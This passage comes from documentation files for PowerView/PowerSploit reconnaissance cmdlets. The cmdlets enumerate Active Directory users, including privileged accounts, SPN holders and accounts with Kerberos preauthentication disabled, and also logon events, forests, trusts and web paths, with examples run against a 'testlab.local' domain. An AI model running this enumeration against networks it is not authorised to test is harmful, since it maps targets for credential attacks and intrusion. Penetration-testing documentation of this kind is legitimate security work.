Description}}\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: LDAP\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n### None\r\n\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.DomainTrust.NET\r\nPowerView.DomainTrust.LDAP\r\nPowerView.DomainTrust.API\r\n\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-DomainUser.md",
    "content": "# Get-DomainUser\r\n\r\n## SYNOPSIS\r\nReturn all users or specific user objects in AD.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-DomainSearcher, Convert-ADName, Convert-LDAPProperty\r\n\r\n## SYNTAX\r\n\r\n### AllowDelegation (Default)\r\n```\r\nGet-DomainUser [[-Identity] <String[]>] [-SPN] [-AdminCount] [-AllowDelegation] [-KerberosPreuthNotRequired]\r\n [-Domain <String>] [-LDAPFilter <String>] [-Properties <String[]>] [-SearchBase <String>] [-Server <String>]\r\n [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>]\r\n [-Tombstone] [-FindOne] [-Credential <PSCredential>] [-Raw]\r\n```\r\n\r\n### DisallowDelegation\r\n```\r\nGet-DomainUser [[-Identity] <String[]>] [-SPN] [-AdminCount] [-DisallowDelegation] [-KerberosPreuthNotRequired]\r\n [-Domain <String>] [-LDAPFilter <String>] [-Properties <String[]>] [-SearchBase <String>] [-Server <String>]\r\n [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>]\r\n [-Tombstone] [-FindOne] [-Credential <PSCredential>] [-Raw]\r\n```\r\n\r\n## DESCRIPTION\r\nBuilds a directory searcher object using Get-DomainSearcher, builds a custom\r\nLDAP filter based on targeting/filter parameters, and searches for all objects\r\nmatching the criteria.\r\nTo only return specific properies, use\r\n\"-Properties samaccountname,usnchanged,...\".\r\nBy default, all user objects for\r\nthe current domain are returned.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-DomainUser -Domain testlab.local\r\n```\r\n\r\nReturn all users for the testlab.local domain\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-DomainUser \"S-1-5-21-890171859-3433809279-3366196753-1108\",\"administrator\"\r\n```\r\n\r\nReturn the user with the given SID, as well as Administrator.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff\r\n```\r\n\r\nlastlogoff                                   samaccountname\r\n----------                                   --------------\r\n12/31/1600 4:00:00 PM                        dfm.a\r\n12/31/1600 4:00:00 PM                        dfm\r\n12/31/1600 4:00:00 PM                        harmj0y\r\n12/31/1600 4:00:00 PM                        Administrator\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\nGet-DomainUser -SearchBase \"LDAP://OU=secret,DC=testlab,DC=local\" -AdminCount -AllowDelegation\r\n```\r\n\r\nSearch the specified OU for privileged user (AdminCount = 1) that allow delegation\r\n\r\n### -------------------------- EXAMPLE 5 --------------------------\r\n```\r\nGet-DomainUser -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon\r\n```\r\n\r\nSearch for users with a primary group ID other than 513 ('domain users') and only return samaccountname and lastlogon\r\n\r\n### -------------------------- EXAMPLE 6 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-DomainUser -Credential $Cred\r\n\r\n### -------------------------- EXAMPLE 7 --------------------------\r\n```\r\nGet-Domain | Select-Object -Expand name\r\n```\r\n\r\ntestlab.local\r\n\r\nGet-DomainUser dev\\user1 -Verbose -Properties distinguishedname\r\nVERBOSE: \\[Get-DomainSearcher\\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local\r\nVERBOSE: \\[Get-DomainSearcher\\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local\r\nVERBOSE: \\[Get-DomainUser\\] filter string: (&(samAccountType=805306368)(|(samAccountName=user1)))\r\n\r\ndistinguishedname\r\n-----------------\r\nCN=user1,CN=Users,DC=dev,DC=testlab,DC=local\r\n\r\n## PARAMETERS\r\n\r\n### -Identity\r\nA SamAccountName (e.g.\r\nharmj0y), DistinguishedName (e.g.\r\nCN=harmj0y,CN=Users,DC=testlab,DC=local),\r\nSID (e.g.\r\nS-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.\r\n4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).\r\nWildcards accepted.\r\nAlso accepts DOMAIN\\user format.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SPN\r\nSwitch.\r\nOnly return user objects with non-null service principal names.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -AdminCount\r\nSwitch.\r\nReturn users with '(adminCount=1)' (meaning are/were privileged).\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -AllowDelegation\r\nSwitch.\r\nReturn user accounts that are not marked as 'sensitive and not allowed for delegation'\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: AllowDelegation\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -DisallowDelegation\r\nSwitch.\r\nReturn user accounts that are marked as 'sensitive and not allowed for delegation'\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: DisallowDelegation\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -KerberosPreuthNotRequired\r\nSwitch.\r\nReturn user accounts with \"Do not require Kerberos preauthentication\" set.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Domain\r\nSpecifies the domain to use for the query, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LDAPFilter\r\nSpecifies an LDAP query string that is used to filter Active Directory objects.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: Filter\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Properties\r\nSpecifies the properties of the output object to retrieve from the server.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchBase\r\nThe LDAP source to search through, e.g.\r\n\"LDAP://OU=secret,DC=testlab,DC=local\"\r\nUseful for OU queries.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ADSPath\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Subtree\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SecurityMasks\r\nSpecifies an option for examining security information of a directory object.\r\nOne of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\nSwitch.\r\nSpecifies that the searcher should also return deleted/tombstoned objects.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -FindOne\r\nOnly return one result object.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: ReturnOne\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Raw\r\nSwitch.\r\nReturn raw results instead of translating the fields into a custom PSObject.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n### String\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.User\r\n\r\nCustom PSObject with translated user property fields.\r\n\r\nPowerView.User.Raw\r\n\r\nThe raw DirectoryServices.SearchResult object, if -Raw is enabled.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-DomainUserEvent.md",
    "content": "# Get-DomainUserEvent\r\n\r\n## SYNOPSIS\r\nEnumerate account logon events (ID 4624) and Logon with explicit credential\r\nevents (ID 4648) from the specified host (default of the localhost).\r\n\r\nAuthor: Lee Christensen (@tifkin_), Justin Warner (@sixdub), Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-DomainUserEvent [[-ComputerName] <String[]>] [-StartTime <DateTime>] [-EndTime <DateTime>]\r\n [-MaxEvents <Int32>] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nThis function uses an XML path filter passed to Get-WinEvent to retrieve\r\nsecurity events with IDs of 4624 (logon events) or 4648 (explicit credential\r\nlogon events) from -StartTime (default of now-1 day) to -EndTime (default of now).\r\nA maximum of -MaxEvents (default of 5000) are returned.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-DomainUserEvent\r\n```\r\n\r\nReturn logon events on the local machine.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-DomainController | Get-DomainUserEvent -StartTime ([DateTime]::Now.AddDays(-3))\r\n```\r\n\r\nReturn all logon events from the last 3 days from every domain controller in the current domain.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-DomainUserEvent -ComputerName PRIMARY.testlab.local -Credential $Cred -MaxEvents 1000\r\n\r\nReturn a max of 1000 logon events from the specified machine using the specified alternate credentials.\r\n\r\n## PARAMETERS\r\n\r\n### -ComputerName\r\nSpecifies the computer name to retrieve events from, default of localhost.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: dnshostname, HostName, name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: $Env:COMPUTERNAME\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -StartTime\r\nThe \\[DateTime\\] object representing the start of when to collect events.\r\nDefault of \\[DateTime\\]::Now.AddDays(-1).\r\n\r\n```yaml\r\nType: DateTime\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [DateTime]::Now.AddDays(-1)\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -EndTime\r\nThe \\[DateTime\\] object representing the end of when to collect events.\r\nDefault of \\[DateTime\\]::Now.\r\n\r\n```yaml\r\nType: DateTime\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [DateTime]::Now\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -MaxEvents\r\nThe maximum number of events to retrieve.\r\nDefault of 5000.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 5000\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target computer.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.LogonEvent\r\n\r\nPowerView.ExplicitCredentialLogonEvent\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/](http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/)\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-Forest.md",
    "content": "# Get-Forest\r\n\r\n## SYNOPSIS\r\nReturns the forest object for the current (or specified) forest.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: ConvertTo-SID\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-Forest [[-Forest] <String>] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nReturns a System.DirectoryServices.ActiveDirectory.Forest object for the current\r\nforest or the forest specified with -Forest X.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-Forest -Forest external.domain\r\n```\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-Forest -Credential $Cred\r\n\r\n## PARAMETERS\r\n\r\n### -Forest\r\nThe forest name to query for, defaults to the current forest.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target forest.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### System.Management.Automation.PSCustomObject\r\n\r\nOutputs a PSObject containing System.DirectoryServices.ActiveDirectory.Forest in addition\r\nto the forest root domain SID.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-ForestDomain.md",
    "content": "# Get-ForestDomain\r\n\r\n## SYNOPSIS\r\nReturn all domains for the current (or specified) forest.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-Forest\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-ForestDomain [[-Forest] <String>] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nReturns all domains for the current forest or the forest specified\r\nby -Forest X.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-ForestDomain\r\n```\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-ForestDomain -Forest external.local\r\n```\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-ForestDomain -Credential $Cred\r\n\r\n## PARAMETERS\r\n\r\n### -Forest\r\nSpecifies the forest name to query for domains.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target forest.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### System.DirectoryServices.ActiveDirectory.Domain\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-ForestGlobalCatalog.md",
    "content": "# Get-ForestGlobalCatalog\r\n\r\n## SYNOPSIS\r\nReturn all global catalogs for the current (or specified) forest.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-Forest\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-ForestGlobalCatalog [[-Forest] <String>] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nReturns all global catalogs for the current forest or the forest specified\r\nby -Forest X by using Get-Forest to retrieve the specified forest object\r\nand the .FindAllGlobalCatalogs() to enumerate the global catalogs.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-ForestGlobalCatalog\r\n```\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-ForestGlobalCatalog -Credential $Cred\r\n\r\n## PARAMETERS\r\n\r\n### -Forest\r\nSpecifies the forest name to query for global catalogs.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### System.DirectoryServices.ActiveDirectory.GlobalCatalog\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-ForestTrust.md",
    "content": "# Get-ForestTrust\r\n\r\n## SYNOPSIS\r\nReturn all forest trusts for the current forest or a specified forest.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-Forest\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-ForestTrust [[-Forest] <String>] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nThis function will enumerate domain trust relationships for the current (or a remote)\r\nforest using number of method using the .NET method GetAllTrustRelationships() on a\r\nSystem.DirectoryServices.ActiveDirectory.Forest returned by Get-Forest.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-ForestTrust\r\n```\r\n\r\nReturn current forest trusts.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-ForestTrust -Forest \"external.local\"\r\n```\r\n\r\nReturn trusts for the \"external.local\" forest.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-ForestTrust -Forest \"external.local\" -Credential $Cred\r\n\r\nReturn trusts for the \"external.local\" forest using the specified alternate credenitals.\r\n\r\n## PARAMETERS\r\n\r\n### -Forest\r\nSpecifies the forest to query for trusts, defaults to the current forest.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: Name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.DomainTrust.NET\r\n\r\nA TrustRelationshipInformationCollection returned when using .NET methods (default).\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-HttpStatus.md",
    "content": "# Get-HttpStatus\r\n\r\n## SYNOPSIS\r\nReturns the HTTP Status Codes and full URL for specified paths.\r\n\r\nPowerSploit Function: Get-HttpStatus  \r\nAuthor: Chris Campbell (@obscuresec)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None  \r\nOptional Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-HttpStatus [-Target] <String> [[-Path] <String>] [[-Port] <Int32>] [-UseSSL]\r\n```\r\n\r\n## DESCRIPTION\r\nA script to check for the existence of a path or file on a webserver.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-HttpStatus -Target www.example.com -Path c:\\dictionary.txt | Select-Object {where StatusCode -eq 20*}\r\n```\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-HttpStatus -Target www.example.com -Path c:\\dictionary.txt -UseSSL\r\n```\r\n\r\n## PARAMETERS\r\n\r\n### -Target\r\nSpecifies the remote web host either by IP or hostname.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Path\r\nSpecifies the remost host.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 2\r\nDefault value: .\\Dictionaries\\admin.txt\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Port\r\nSpecifies the port to connect to.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 3\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -UseSSL\r\nUse an SSL connection.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n## NOTES\r\nHTTP Status Codes: 100 - Informational * 200 - Success * 300 - Redirection * 400 - Client Error * 500 - Server Error\r\n\r\n## RELATED LINKS\r\n\r\n[http://obscuresecurity.blogspot.com\r\nhttp://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html]()\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-NetComputerSiteName.md",
    "content": "# Get-NetComputerSiteName\r\n\r\n## SYNOPSIS\r\nReturns the AD site where the local (or a remote) machine resides.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-NetComputerSiteName [[-ComputerName] <String[]>] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nThis function will use the DsGetSiteName Win32API call to look up the\r\nname of the site where a specified computer resides.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-NetComputerSiteName -ComputerName WINDOWS1.testlab.local\r\n```\r\n\r\nReturns the site for WINDOWS1.testlab.local.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-DomainComputer | Get-NetComputerSiteName\r\n```\r\n\r\nReturns the sites for every machine in AD.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-NetComputerSiteName -ComputerName WINDOWS1.testlab.local -Credential $Cred\r\n\r\n## PARAMETERS\r\n\r\n### -ComputerName\r\nSpecifies the hostname to check the site for (also accepts IP addresses).\r\nDefaults to 'localhost'.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: HostName, dnshostname, name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: Localhost\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the remote system using Invoke-UserImpersonation.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.ComputerSite\r\n\r\nA PSCustomObject containing the ComputerName, IPAddress, and associated Site name.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-NetLocalGroup.md",
